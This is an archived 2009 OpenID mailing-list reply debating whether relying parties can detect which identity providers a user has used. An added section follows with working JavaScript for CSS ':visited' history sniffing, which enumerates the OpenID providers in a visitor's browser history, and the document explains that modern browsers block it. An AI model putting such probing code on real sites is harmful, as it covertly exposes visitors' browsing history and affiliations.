Discovery of an OpenID session at an OP

John Panzer jpanzer at google.com
Mon Dec 14 23:06:20 UTC 2009


On Mon, Dec 14, 2009 at 1:36 PM, Peter Watkins <peterw at tux.org> wrote:

> On Mon, Dec 14, 2009 at 11:32:40AM -0800, John Panzer wrote:
> > On Mon, Dec 14, 2009 at 11:21 AM, Peter Watkins <peterw at tux.org> wrote:
>
> > > I don't want the data-hungry folks at Facebook noticing that I'm logged
> > > in to the Greenpeace or National Rifle Association unless I explicitly
> > > approve letting Facebook know that.
>
> > (Note that
> > even today, you may be able to use visited-link color hacks to determine
> > what OPs a user has recently frequented; statistically speaking you can
> > already get the information you're worried about.)
>
> I call that the "Grandfather Clause" Fallacy, and I see it pretty often.
> Your argument is that because there's already an exposure (due to
> unintentional consequence of DOM/Javascript interaction), it's OK to build
> new systems & specs that are known to have the flaw from day one. You're
> arguing that the privacy flaw exhibited in the link status checking should
> be "grandfathered" in.
>
> Why not raise the bar, and make the web a *better* place instead of settling
> for today's lowest common denominator?
>

The part of my response that you cut out argued for exactly that.
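The "visited-link color hack" mentioned in the quoted exchange is CSS history sniffing: a page styles `a:visited` differently from `a:link`, inserts anchors pointing at URLs it is curious about, and reads the rendered colour back through `getComputedStyle`. The example below is added here and is not code from the thread or from any OpenID project; it shows how a relying party could have enumerated which OpenID providers a visitor had in browser history in 2009, without any OpenID request being made. The list of OP endpoints is a constructed illustration, and the `sniffVisited`, `makeDomProbe` and `makeSimulatedProbe` helpers are hypothetical names chosen for this example. The probe is injectable so the enumeration logic can run outside a browser against a constructed history set.

```javascript
// Added example (not from the original thread): the ":visited color" history
// sniffing trick referred to in the quoted message, as it worked in browsers
// before they began hiding the visited state from getComputedStyle.
// A relying party page could embed this and learn which OpenID providers the
// visitor had been to, with no OpenID exchange taking place at all.

// Candidate OP endpoints to probe (constructed list for illustration).
const OP_CANDIDATES = [
  'https://www.google.com/accounts/o8/id',
  'https://me.yahoo.com/',
  'https://www.myopenid.com/',
  'https://openid.aol.com/',
];

// Colour the sniffing page assigns to visited links in its stylesheet:
//   a:visited { color: rgb(255, 0, 0); }
const VISITED_COLOR = 'rgb(255, 0, 0)';
const UNVISITED_COLOR = 'rgb(0, 0, 255)';

// Core logic: run `probe` (returns the rendered link colour for a URL) over
// each candidate and return the URLs rendered with the visited colour.
function sniffVisited(candidates, probe, visitedColor = VISITED_COLOR) {
  const visited = [];
  for (const url of candidates) {
    if (probe(url) === visitedColor) {
      visited.push(url);
    }
  }
  return visited;
}

// Browser probe: install the a:visited rule, then for each URL insert an
// off-screen <a href=url>, read its computed colour, and remove it again.
// On a pre-2011 browser this returned the a:visited colour for URLs in history.
function makeDomProbe(doc, win) {
  const style = doc.createElement('style');
  style.textContent =
    `a:visited { color: ${VISITED_COLOR}; } a:link { color: ${UNVISITED_COLOR}; }`;
  doc.head.appendChild(style);
  return function probe(url) {
    const a = doc.createElement('a');
    a.href = url;
    a.textContent = 'probe';
    a.style.position = 'absolute';
    a.style.left = '-9999px';
    doc.body.appendChild(a);
    const color = win.getComputedStyle(a).color;
    doc.body.removeChild(a);
    return color;
  };
}

// Simulated probe for running outside a browser: `historySet` stands in for
// the victim's browsing history (constructed data, for demonstration only).
function makeSimulatedProbe(historySet) {
  return url => (historySet.has(url) ? VISITED_COLOR : UNVISITED_COLOR);
}

if (typeof document !== 'undefined') {
  // In a browser: probe the real history via the DOM.
  console.log('visited OPs:', sniffVisited(OP_CANDIDATES, makeDomProbe(document, window)));
} else {
  // Outside a browser: demonstrate the enumeration against a constructed history.
  const fakeHistory = new Set(['https://www.myopenid.com/']);
  console.log('simulated visited OPs:',
    sniffVisited(OP_CANDIDATES, makeSimulatedProbe(fakeHistory)));
}
```

Caveat for anyone running the DOM variant today: current browsers (Firefox from version 4 and Chromium-based browsers since 2010) restrict which properties `a:visited` may change and make `getComputedStyle` report the unvisited style, so the browser probe now returns an empty list. The leak the message describes was real when it was written; it was closed in the browser, not in any identity spec.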